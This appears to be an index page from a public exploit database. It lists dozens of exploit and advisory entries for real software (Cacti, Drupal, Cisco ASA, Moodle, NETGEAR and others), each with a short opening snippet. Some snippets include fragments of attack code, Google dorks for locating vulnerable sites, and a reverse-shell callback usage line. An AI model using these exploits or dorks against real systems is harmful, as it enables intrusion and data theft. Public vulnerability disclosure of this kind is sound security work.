IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting Date: 2020-01-27 Author: Lutfu Mert Ceylan Vendor Homepage: www.icewarp.com Tested on: Windows 10 Versions: 11.4.4.1 and before Vulnerable Parameter: "color" Get Method...
Cacti 1.2.8 - Unauthenticated Remote Code Execution
Cacti 1.2.8 - Unauthenticated Remote Code Execution !/usr/bin/python3 Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution Date: 03/02/2020 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33...
ThinVNC 1.0b1 - Authentication Bypass
ThinVNC 1.0b1 - Authentication Bypass Exploit Title: ThinVNC 1.0b1 - Authentication Bypass Date: 2019-10-17 Exploit Author: Nikhith Tumamlapalli Contributor WarMarX Vendor Homepage: https://sourceforge.net/projects/thinvnc/ Software Link:...
Microsoft DirectWrite AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar
Microsoft DirectWrite AFDKO - Use of Uninitialized Memory While Freeing Resources in varloadavar -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library...
Cisco Adaptive Security Appliance - Path Traversal
Cisco Adaptive Security Appliance - Path Traversal ''' Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques. Vulnerabl...
RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation
RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation Title: RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation Date: 2017-12-11 Author: LiquidWorm Vendor: Rockwell Automation, Inc. Product web page: https://www.rockwellautomation.com Affected version: Rockwell...
Rockwell Scada System 27.011 - Cross-Site Scripting
Rockwell Scada System 27.011 - Cross-Site Scripting Exploit Title: Rockwell Scada System - Cross-Site Scripting Date: 2018-05-16 Exploit Author: t4rkd3vilz Vendor Homepage: https://rockwellautomation.com/ Software Link:...
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure
Lutron Quantum 2.0 - 3.2.243 - Information Disclosure ''' Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware Date: 20-03-2018 Exploit Author: David Castro Contact: https://twitter.com/SadFud75 Vendor Homepage: http://www.lutron.com Software Link:...
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution
Advantech WebAccess 8.3 - Directory Traversal Remote Code Execution !/usr/bin/python2.7 Exploit Title: Advantech WebAccess 8.3 webvrpcs Directory Traversal RCE Vulnerability Date: 03-11-2018 Exploit Author: Chris Lyne @lynerc Vendor Homepage: www.advantech.com Software Link:...
NETGEAR Routers - Password Disclosure
NETGEAR Routers - Password Disclosure Trustwave SpiderLabs Security Advisory TWSL2017-003: Multiple Vulnerabilities in NETGEAR Routers Published: 01/30/2017 Version: 1.0 Vendor: NETGEAR http://www.netgear.com/ Product: Multiple products Finding 1: Remote and Local Password Disclosure Credit: Simo...
McAfee Virus Scan Enterprise for Linux 1.9.2 2.0.2 - Remote Code Execution
McAfee Virus Scan Enterprise for Linux 1.9.2 2.0.2 - Remote Code Execution ''' Source: https://nation.state.actor/mcafee.html Vulnerabilities CVE-2016-8016: Remote Unauthenticated File Existence Test CVE-2016-8017: Remote Unauthenticated File Read with Constraints CVE-2016-8018: No Cross-Site...
Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
Linux Kernel x86 - Disable ASLR by Setting the RLIMITSTACK Resource to Unlimited Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html CVE-2016-3672 - Unlimiting the stack not longer disables ASLR Authors: Hector Marco & Ismael Ripoll CVE: CVE-2016-3672...
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service !/usr/bin/perl miniupnpd/1.0 remote denial of service exploit Copyright 2015 c Todor Donev [email protected] http://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg The SSDP protocol can discover Plug & Play devices, with...
CuteNews 2.0.3 - Arbitrary File Upload
CuteNews 2.0.3 - Arbitrary File Upload CuteNews 2.0.3 Remote File Upload Vulnerability...
Nginx 1.3.9 1.4.0 - Denial of Service (PoC)
Nginx 1.3.9 1.4.0 - Denial of Service PoC Exploit Title: nginx v1.3.9-1.4.0 DOS POC CVE-2013-2028 Google Dork: CVE-2013-2028 Date: 16.05.2013 Exploit Author: Mert SARICA - mert . sarica @ gmail . com - http://www.mertsarica.com Vendor Homepage: http://nginx.org/ Software Link:...
Microsoft Office - HtmlDlgHelper Class Memory Corruption (MS10-071)
Microsoft Office - HtmlDlgHelper Class Memory Corruption MS10-071 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com Microsoft Office HtmlDlgHelper class memory corruption 1. Advisory Information Title: Microsoft Office HtmlDlgHelper class memory corruption Advisory I...
IBM AIX 5.66.1 - _LIB_INIT_DBG Arbitrary File Overwrite via Libc Debug
IBM AIX 5.66.1 - LIBINITDBG Arbitrary File Overwrite via Libc Debug !/bin/sh $Id: raptorlibC,v 1.1 2009/09/10 15:08:04 raptor Exp $ raptorlibC - AIX arbitrary file overwrite via libC debug Copyright c 2009 Marco Ivaldi Property of @ Mediaservice.net Srl Data Security Division...
Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)
Linksys WRT54G Firmware 1.00.9 - Security Bypass 1 regurgitated by: meathive url: kinqpinz.info ; Tue, 05 Feb 2008 07:51:41 -0700 CVE-2008-1247 WRT54G firmware version: v1.00.9 Default LAN IP: 192.168.1.1 Default auth: user:blank - pass:admin Authorization: Basic OmFkbWlu php print...
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass !/bin/sh NTLM && BASIC AUTH BYPASS : sha0atbadchecksum.net Based on my adv: https://www.securityfocus.com/bid/24105/info CVE-2007-2815 if $ != 2 then printf "USAGE:\t\t$0 \nExample:\t$0 http://www.microsoft.com /en/us/default.aspx\n\n";...
Squirrelcart 2.2.0 - cart_content.php Remote File Inclusion
Squirrelcart 2.2.0 - cartcontent.php Remote File Inclusion Title : Squirrelcart = 2.2.0 Remote File Inclusion URL : http://www.ldev.com/ google Dork : inurl:/squirrelcart/ Author : OLiBekaS greetz : Skulmatic, weleh, brokencode, bigmaster and all papmahackerlink crew Exploit :...
ACal 2.2.6 - day.php Remote File Inclusion
ACal 2.2.6 - day.php Remote File Inclusion Title: ACal 2.2.6 = Remote File Inclusion URL: http://acalproj.sourceforge.net/ Dork: intitle:"Login to Calendar" Credits: PiNGuX Greetz : 0o Exploit:...
Invision Power Board 2.1.5 - lastdate Remote Code Execution
Invision Power Board 2.1.5 - lastdate Remote Code Execution !/usr/bin/perl Invision Power Board 2. commands execution exploit by RST/GHC vulnerable versions new Proto = "tcp", PeerAddr = "$host", PeerPort = "80" || die "- CONNECTION FAILED"; $login = s/./"%".ucsprintf"%2.2x",ord$1/eg; $password =...
phpLinks 2.1.2 - Multiple Vulnerabilities
phpLinks 2.1.2 - Multiple Vulnerabilities phpLinks Multiple Vulnerabilities Vendor: destiney.com Product: phpLinks Version: = 2.1.2 Website: http://phplinks.sourceforge.net/ BID: 6632 6633 Description: phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link far...
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection
Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection !/usr/bin/python """ Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability Tested on: Cisco DCNM 11.2.1 Installer for Windows 64-bit - Release: 11.21 - Release Date:...
Centreon 19.10.5 - Pollers Remote Command Execution
Centreon 19.10.5 - Pollers Remote Command Execution Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution Date: 2020-01-27 Exploit Author: Omri Baso, Fabien Aunay Vendor Homepage: https://www.centreon.com/ Software Link: https://github.com/centreon/centreon Version: 19.10.5 Tested...
Studio 5000 Logix Designer 30.01.00 - FactoryTalk Activation Service Unquoted Service Path
Studio 5000 Logix Designer 30.01.00 - FactoryTalk Activation Service Unquoted Service Path Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path Discovery by: Luis Martinez Discovery Date: 2019-11-18 Vendor Homepage:...
Optergy 2.3.0a - Remote Code Execution (Backdoor)
Optergy 2.3.0a - Remote Code Execution Backdoor Title: Optergy 2.3.0a - Remote Code Execution Author: LiquidWorm Date: 2019-11-05 Vendor: https://optergy.com/ Product web page: https://optergy.com/products/ Affected version: \n' sys.exit while True: challengeurl =...
Spring Security OAuth - Open Redirector
Spring Security OAuth - Open Redirector Exploit Title: Open Redirector in spring-security-oauth2 Date: 17 June 2019 Exploit Author: Riemann Vendor Homepage: https://spring.io/projects/spring-security-oauth Software Link: https://spring.io Version: Spring Security OAuth versions 2.3 prior to 2.3.6...
PHPads 2.0 - click.php3?bannerID SQL Injection
PHPads 2.0 - click.php3?bannerID SQL Injection + Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: https://blondish.net/ + Software Demo :...
Microsoft Windows 72008 - Win32k Denial of Service (PoC)
Microsoft Windows 72008 - Win32k Denial of Service PoC Exploit Title: Microsoft Windows Win32k CVE-2019-0808 Local Privilege Escalation Vulnerability Date: 24/03/2019 Exploit Author: ze0r Vendor Homepage: www.microsoft.com Version: Microsoft Windows 7/ Server 2008 CVE : CVE-2019-0808...
Moodle 3.4.1 - Remote Code Execution
Moodle 3.4.1 - Remote Code Execution php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure...
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation
Microsoft Windows 10 - COM Desktop Broker Privilege Escalation Windows: COM Desktop Broker Elevation of Privilege Platform: Windows 10 1809 almost certainly earlier versions as well. Class: Elevation of Privilege Security Boundary per Windows Security Service Criteria: AppContainer Sandbox Summar...
Modx Revolution 2.6.4 - Remote Code Execution
Modx Revolution 2.6.4 - Remote Code Execution Exploit Title: Modx Revolution ' if requests.get target + '/connectors/system/phpthumb.php', verify=verify.statuscode != 404: printFore.GREEN + '/connectors/system/phpthumb.php - found' url = target + '/connectors/system/phpthumb.php' payload = 'ctx':...
NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities
NUUO NVRmini2 NVRsolo Crystal Devices NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities Multiple vulnerabilities in NUUO NVRmini2 / NVRsolo / Crystal devices and NETGEAR ReadyNAS Surveillance application Discovered by Pedro Ribeiro [email protected], Agile Information Security...
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation MS14-070 """ KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date:...
FreeBSD - Multiple Vulnerabilities
FreeBSD - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ FreeBSD Kernel Multiple Vulnerabilities 1. Advisory Information Title: FreeBSD Kernel Multiple Vulnerabilities Advisory ID: CORE-2015-0003 Advisory URL:...
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (Add Admin User)
Drupal 7.0 7.31 - Drupalgeddon SQL Injection Add Admin User !/usr/bin/python Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005 Inspired by yukyuk's P.o.C https://www.reddit.com/user/fyukyuk Tested on Drupal 7.31 with BackBox 3.x This material is intended for...
Ammyy Admin 3.2 - Authentication Bypass
Ammyy Admin 3.2 - Authentication Bypass Title: ==== Ammyy Admin - Hidden hard-coded option and Access Control vulnerability. Credit: ====== Name: Bhadresh Patel Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: ==== - CVE-2013-5581 for hidden hard-coded...
TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities
TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com TP-Link IP Cameras Multiple Vulnerabilities 1. Advisory Information Title: TP-Link IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0318 Advisory URL:...
MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities
MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ MayGion IP Cameras multiple vulnerabilities 1. Advisory Information Title: MayGion IP Cameras multiple vulnerabilities Advisory ID: CORE-2013-0322 Advisory URL:...
Cisco Linksys E4200 - Multiple Vulnerabilities
Cisco Linksys E4200 - Multiple Vulnerabilities -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ============================================= XSS, LFI in Cisco, Linksys E4200 Firmware ============================================= URL:...
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker...
phpMyBitTorrent 2.0.4 - SQL Injection
phpMyBitTorrent 2.0.4 - SQL Injection Exploit Title: phpMyBitTorrent 2.0.4 SQL injection Google Dork: inurl:"user.php?op=register" Date: 14/FEB/2011 Author: [email protected] Software Link: http://sourceforge.net/projects/phpmybittorrent/ Version: 2.0.4 Tested on: nix...
VMware Tools - Update OS Command Injection
VMware Tools - Update OS Command Injection VMware Tools update OS Command Injection ======================================== 1. Advisory Information Advisory ID: BONSAI-2010-0110 Date published: Thu Dec 9, 2010 Vendors contacted: VMware Release mode: Coordinated release 2. Vulnerability Informati...
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite
Linux Kernel 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite // source: https://www.securityfocus.com/bid/44242/info / CVE-2010-2963 Arbitrary write memory write via v4l1 compat ioctl. Kees Cook greets to drosenberg, spender, taviso / define GNUSOURCE include include include include includ...
WeBProdZ CMS - SQL Injection
WeBProdZ CMS - SQL Injection Exploit Title : WeBProdZ CMS SQL...
0DayDB 2.3 - id Remote Authentication Bypass
0DayDB 2.3 - id Remote Authentication Bypass !/usr/bin/perl Autor : Pr0metheuS Script : 0DayDB v2.3 Version : v2.3 Dork : "Powered By 0DayDB v2.3" Gr33tz-Team.org use LWP::UserAgent; if@ARGV!=3 print "\n"; print "0DayDB v2.3 Remote Admin Bypass\n"; print "perl $0 \n"; print "downloads ID for...
bwired - index.php?newsID SQL Injection
bwired - index.php?newsID SQL Injection Program Title bwired - Remote SQL Injection Note There is also XSS, PHPSESSID session fixation, and cookie manipulation which I...
Invision Power Board 2.1.4 - Register Users Denial of Service
Invision Power Board 2.1.4 - Register Users Denial of Service !/usr/bin/perl use IO::Socket; IPB Register Multiple Users Denial of Service Doesn't Work on forums using "Code Confirmation" Created By SkOd SED security Team http://www.sed-team.be [email protected] ISRAEL print q...
Gemitel 3.50 - affich.php Remote File Inclusion Command Injection
Gemitel 3.50 - affich.php Remote File Inclusion Command Injection source: https://www.securityfocus.com/bid/10156/info A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the...